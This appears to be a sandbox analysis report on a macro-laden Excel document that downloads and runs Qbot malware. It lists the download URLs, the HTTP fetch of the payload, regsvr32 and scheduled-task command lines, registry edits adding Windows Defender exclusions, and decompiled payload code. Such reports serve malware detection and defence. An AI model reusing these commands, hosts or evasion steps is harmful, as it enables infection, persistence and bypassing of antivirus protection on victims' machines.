                                  Stream Path:\x1CompObj
                                  File Type:data
                                  Stream Size:108
                                  Entropy:4.29316615018
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                  General
                                  Stream Path:\x5DocumentSummaryInformation
                                  File Type:data
                                  Stream Size:244
                                  Entropy:2.65175227267
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
                                  General
                                  Stream Path:\x5SummaryInformation
                                  File Type:data
                                  Stream Size:208
                                  Entropy:3.33231709703
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . % . > . . . . . . . . . . .
                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 111238
                                  General
                                  Stream Path:Workbook
                                  File Type:Applesoft BASIC program data, first line number 16
                                  Stream Size:111238
                                  Entropy:7.57013249535
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . V d g t j g h k B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
                                  Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 698
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                                  File Type:ASCII text, with CRLF line terminators
                                  Stream Size:698
                                  Entropy:5.28132485046
                                  Base64 Encoded:True
                                  Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0
                                  Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/PROJECTlk
                                  File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
                                  Stream Size:30
                                  Entropy:1.37215976263
                                  Base64 Encoded:False
                                  Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 140
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                  File Type:data
                                  Stream Size:140
                                  Entropy:3.43277227638
                                  Base64 Encoded:False
                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                  Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
                                  File Type:data
                                  Stream Size:97
                                  Entropy:3.61064918306
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                  Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
                                  File Type:ASCII text, with CRLF line terminators
                                  Stream Size:302
                                  Entropy:4.65399600072
                                  Base64 Encoded:True
                                  Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
                                  Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 226
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/UserForm2/f
                                  File Type:data
                                  Stream Size:226
                                  Entropy:2.95233038999
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . .
                                  Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 272
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/UserForm2/o
                                  File Type:data
                                  Stream Size:272
                                  Entropy:3.65039542802
                                  Base64 Encoded:True
                                  Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 8 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a 1 . . . ( . ( . . . . . . . h t t p : / / 9 4 . 1 4 0 . 1 1 2 . 1 2 6 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 4 1 . 2 7 . 2 1 3 / . . . . . . . . . . . . . . 5 . . . . . . .
                                  Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4469
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                  File Type:data
                                  Stream Size:4469
                                  Entropy:4.43292705507
                                  Base64 Encoded:False
                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2476
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                  File Type:data
                                  Stream Size:2476
                                  Entropy:3.52262448927
                                  Base64 Encoded:False
                                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 146
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                  File Type:data
                                  Stream Size:146
                                  Entropy:1.48909835582
                                  Base64 Encoded:False
                                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 170
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                  File Type:data
                                  Stream Size:170
                                  Entropy:1.65437585425
                                  Base64 Encoded:False
                                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 156
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                  File Type:data
                                  Stream Size:156
                                  Entropy:1.63365900945
                                  Base64 Encoded:False
                                  Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1073
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                  File Type:data
                                  Stream Size:1073
                                  Entropy:6.68948856439
                                  Base64 Encoded:True

                                  Network Behavior

                                  Snort IDS Alerts

                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                  09/28/21-22:15:36.369264 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.153 | 192.168.2.22
                                  09/28/21-22:15:41.392548 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.153 | 192.168.2.22
                                  09/28/21-22:15:47.400673 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.153 | 192.168.2.22
                                  09/28/21-22:15:59.416683 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.155 | 192.168.2.22
                                  09/28/21-22:16:02.428431 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.155 | 192.168.2.22
                                  09/28/21-22:16:07.600790 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.155 | 192.168.2.22

                                  Network Port Distribution

                                  TCP Packets

                                  Sep 28, 2021 22:14:52.823753119 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:52.823776007 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:52.823781967 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:52.823797941 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:52.823812962 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:52.823853970 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:52.827244997 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.011290073 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.011470079 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.030011892 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.030158997 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.030191898 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.030224085 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.030256987 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.030280113 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.030282974 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.030303001 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.030306101 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.030307055 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.030308008 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.030309916 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.030332088 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.030348063 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.030354977 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.030368090 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.030385017 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.030385017 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.030390024 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.030400038 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.030410051 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.030419111 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.030436039 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.031949043 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.199135065 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.199327946 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.236825943 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.236860037 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.236876011 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.236893892 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.236917019 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.236938000 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.236958027 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.236979008 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237001896 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237025023 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237045050 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237154007 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.237694025 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237719059 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237730026 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.237741947 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237763882 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237785101 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237796068 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.237802029 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237824917 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237847090 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237858057 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.237868071 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237889051 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237906933 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.237910032 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237938881 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:14:53.237941027 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.238049984 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.239322901 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:14:53.265450001 CEST4916880192.168.2.2294.140.112.126
                                  Sep 28, 2021 22:14:56.274494886 CEST4916880192.168.2.2294.140.112.126
                                  Sep 28, 2021 22:15:02.280958891 CEST4916880192.168.2.2294.140.112.126
                                  Sep 28, 2021 22:15:14.296915054 CEST4916980192.168.2.2294.140.112.126
                                  Sep 28, 2021 22:15:17.305135012 CEST4916980192.168.2.2294.140.112.126
                                  Sep 28, 2021 22:15:23.311655045 CEST4916980192.168.2.2294.140.112.126
                                  Sep 28, 2021 22:15:35.358654976 CEST4917080192.168.2.22185.141.27.213
                                  Sep 28, 2021 22:15:38.366909981 CEST4917080192.168.2.22185.141.27.213
                                  Sep 28, 2021 22:15:44.373528004 CEST4917080192.168.2.22185.141.27.213
                                  Sep 28, 2021 22:15:56.389406919 CEST4917180192.168.2.22185.141.27.213
                                  Sep 28, 2021 22:15:58.301590919 CEST8049167190.14.37.187192.168.2.22
                                  Sep 28, 2021 22:15:58.301810980 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:15:59.398540974 CEST4917180192.168.2.22185.141.27.213
                                  Sep 28, 2021 22:16:05.404292107 CEST4917180192.168.2.22185.141.27.213
                                  Sep 28, 2021 22:16:41.055510998 CEST4916780192.168.2.22190.14.37.187
                                  Sep 28, 2021 22:16:41.243612051 CEST8049167190.14.37.187192.168.2.22

                                  HTTP Request Dependency Graph

                                  • 190.14.37.187

                                  HTTP Packets

                                  Session ID:0
                                  Source IP:192.168.2.22
                                  Source Port:49167
                                  Destination IP:190.14.37.187
                                  Destination Port:80
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                                  Timestamp:Sep 28, 2021 22:14:49.526351929 CEST
                                  kBytes transferred:0
                                  Direction:OUT
                                  Data:
                                  GET /44467.926671412.dat HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: 190.14.37.187
                                  Connection: Keep-Alive

                                  Timestamp:Sep 28, 2021 22:14:50.548295975 CEST
                                  kBytes transferred:1
                                  Direction:IN
                                  Data:
                                  HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Tue, 28 Sep 2021 20:14:50 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 259072
                                  Connection: keep-alive
                                  X-Powered-By: PHP/5.4.16
                                  Accept-Ranges: bytes
                                  Expires: 0
                                  Cache-Control: no-cache, no-store, must-revalidate
                                  Content-Disposition: attachment; filename="44467.926671412.dat"


                                  System Behavior

                                  General

                                  Start time:22:14:20
                                  Start date:28/09/2021
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                  Imagebase:0x13f5f0000
                                  File size:28253536 bytes
                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  General

                                  Start time:22:15:52
                                  Start date:28/09/2021
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:regsvr32 -silent ..\Drezd.red
                                  Imagebase:0xff880000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:22:15:53
                                  Start date:28/09/2021
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline: -silent ..\Drezd.red
                                  Imagebase:0x700000
                                  File size:14848 bytes
                                  MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.616094137.00000000001E0000.00000004.00000001.sdmp, Author: Joe Security
                                  Reputation:moderate

                                  General

                                  Start time:22:15:56
                                  Start date:28/09/2021
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                  Imagebase:0x5d0000
                                  File size:2972672 bytes
                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Start time:22:15:58
                                  Start date:28/09/2021
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:regsvr32 -silent ..\Drezd1.red
                                  Imagebase:0xff880000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:22:15:58
                                  Start date:28/09/2021
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29
                                  Imagebase:0xdf0000
                                  File size:179712 bytes
                                  MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:22:15:58
                                  Start date:28/09/2021
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:regsvr32 -silent ..\Drezd2.red
                                  Imagebase:0xff880000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:22:16:00
                                  Start date:28/09/2021
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                                  Imagebase:0xffdf0000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  General

                                  Start time:22:16:00
                                  Start date:28/09/2021
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline: -s 'C:\Users\user\Drezd.red'
                                  Imagebase:0xc40000
                                  File size:14848 bytes
                                  MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.631006029.00000000001D0000.00000004.00000001.sdmp, Author: Joe Security

                                  General

                                  Start time:22:16:03
                                  Start date:28/09/2021
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                  Imagebase:0x5d0000
                                  File size:2972672 bytes
                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Author: Joe Security

                                  General

                                  Start time:22:16:05
                                  Start date:28/09/2021
                                  Path:C:\Windows\System32\reg.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Qukpmcii' /d '0'
                                  Imagebase:0xff7a0000
                                  File size:74752 bytes
                                  MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  General

                                  Start time:22:16:06
                                  Start date:28/09/2021
                                  Path:C:\Windows\System32\reg.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Xicyyyqnqeyf' /d '0'
                                  Imagebase:0xffd40000
                                  File size:74752 bytes
                                  MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  General

                                  Start time:22:17:00
                                  Start date:28/09/2021
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                                  Imagebase:0xff600000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  General

                                  Start time:22:17:00
                                  Start date:28/09/2021
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline: -s 'C:\Users\user\Drezd.red'
                                  Imagebase:0x910000
                                  File size:14848 bytes
                                  MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Disassembly

                                  Code Analysis

                                    Executed Functions

                                    C-Code - Quality: 91%
                                    			E1000D01F(void* __fp0) {
                                    				long _v8;
                                    				long _v12;
                                    				union _SID_NAME_USE _v16;
                                    				struct _SYSTEM_INFO _v52;
                                    				char _v180;
                                    				short _v692;
                                    				char _v704;
                                    				char _v2680;
                                    				void* __esi;
                                    				struct _OSVERSIONINFOA* _t81;
                                    				intOrPtr _t83;
                                    				void* _t84;
                                    				long _t86;
                                    				void** _t88;
                                    				intOrPtr _t90;
                                    				intOrPtr _t91;
                                    				intOrPtr _t92;
                                    				intOrPtr _t97;
                                    				void* _t98;
                                    				intOrPtr _t103;
                                    				char* _t105;
                                    				void* _t108;
                                    				intOrPtr _t111;
                                    				long _t115;
                                    				signed int _t117;
                                    				long _t119;
                                    				intOrPtr _t124;
                                    				intOrPtr _t127;
                                    				intOrPtr _t130;
                                    				intOrPtr _t134;
                                    				intOrPtr _t145;
                                    				intOrPtr _t147;
                                    				intOrPtr _t149;
                                    				intOrPtr _t152;
                                    				intOrPtr _t154;
                                    				signed int _t159;
                                    				struct HINSTANCE__* _t162;
                                    				short* _t164;
                                    				intOrPtr _t167;
                                    				WCHAR* _t168;
                                    				char* _t169;
                                    				intOrPtr _t181;
                                    				intOrPtr _t200;
                                    				void* _t215;
                                    				long _t218;
                                    				void* _t219;
                                    				char* _t220;
                                    				struct _OSVERSIONINFOA* _t222;
                                    				void* _t223;
                                    				int* _t224;
                                    				void* _t241;
                                    
                                    				_t241 = __fp0;
                                    				_t162 =  *0x1001e69c; // 0x10000000
                                    				_t81 = E10008604(0x1ac4);
                                    				_t222 = _t81;
                                    				if(_t222 == 0) {
                                    					return _t81;
                                    				}
                                    				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                                    				_t83 =  *0x1001e684; // 0x8abfaa0
                                    				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                                    				_t3 = _t222 + 0x648; // 0x648
                                    				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                                    				_t5 = _t222 + 0x1644; // 0x1644
                                    				_t216 = _t5;
                                    				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                                    				_t227 = _t86;
                                    				if(_t86 != 0) {
                                    					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
                                    				}
                                    				GetCurrentProcess();
                                    				_t88 = E1000BA05(); // executed
                                    				 *(_t222 + 0x110) = _t88;
                                    				_t178 =  *_t88;
                                    				if(E1000BB8D( *_t88) == 0) {
                                    					_t90 = E1000BA62(_t178, _t222); // executed
                                    					__eflags = _t90;
                                    					_t181 = (0 | _t90 > 0x00000000) + 1;
                                    					__eflags = _t181;
